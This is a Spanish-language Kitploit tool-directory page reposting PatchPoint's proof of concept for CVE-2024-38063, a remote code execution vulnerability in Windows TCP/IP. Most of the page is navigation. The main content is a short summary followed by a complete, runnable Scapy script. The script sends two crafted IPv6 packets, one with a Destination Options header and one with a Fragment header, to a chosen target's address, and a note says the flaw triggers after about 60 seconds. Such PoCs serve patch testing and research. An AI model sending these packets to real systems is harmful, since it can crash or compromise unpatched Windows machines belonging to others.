Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-38063 | Kitploit
Herramientas/GitHubGitHub/patchpoint/cve-2024-38063
Análisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónDesarrollo de PayloadsExplotación de Binarios
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

Ver Repositorio
203hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-38063

Resumen

En agosto de 2024, Microsoft publicó un parche para una vulnerabilidad de ejecución remota de código (RCE) en TCP/IP de Windows. Algunos investigadores ya han publicado pruebas de concepto (PoC) para esta vulnerabilidad y, casi al mismo tiempo, los investigadores de PatchPoint también completaron su análisis y reproducción de este problema. Debido a la propagación de desinformación en varias plataformas, incluida Twitter, parece que los puntos críticos necesarios para desencadenar esta vulnerabilidad se han malinterpretado. Contrariamente a estas imprecisiones, hemos decidido publicar una PoC que demuestra cómo se puede desencadenar esta vulnerabilidad con la transmisión de solo dos paquetes.; En realidad, no es necesario un gran número de paquetes para desencadenar esta vulnerabilidad.

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

DEMO

CVE-2024-38063_Demo.mp4

※ Para desencadenar la vulnerabilidad, se requiere un tiempo de espera de aproximadamente 60 segundos

Referencia

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
Descargar herramienta